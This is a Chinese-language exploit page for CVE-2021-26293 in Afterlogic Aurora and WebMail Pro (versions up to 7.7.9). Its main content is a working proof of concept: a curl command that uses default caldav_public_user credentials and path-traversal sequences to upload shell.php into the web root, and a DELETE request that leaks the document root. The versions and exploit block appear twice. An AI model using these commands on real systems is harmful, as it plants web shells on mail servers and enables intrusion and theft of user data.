CVE-2021-26293_Afterlogic_Aurora_&_WebMail_Pro_文件上傳漏洞

# CVE-2021-26293 Afterlogic Aurora & WebMail Pro 文件上傳漏洞
==影響版本==

WebMail Pro ≤ 7.7.9
Afterlogic Aurora ≤ 7.7.9

==POC==

curl -T shell.php -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/persona/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e/var/www/html/shell.php"

默認路徑為/var/www/html,也可能更改配置為其它路徑,可以嘗試其它方式獲取。

curl -X DELETE -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/personal/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021"

==影響版本==

WebMail Pro ≤ 7.7.9
Afterlogic Aurora ≤ 7.7.9

==POC==

curl -T shell.php -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/persona/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e/var/www/html/shell.php"
© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容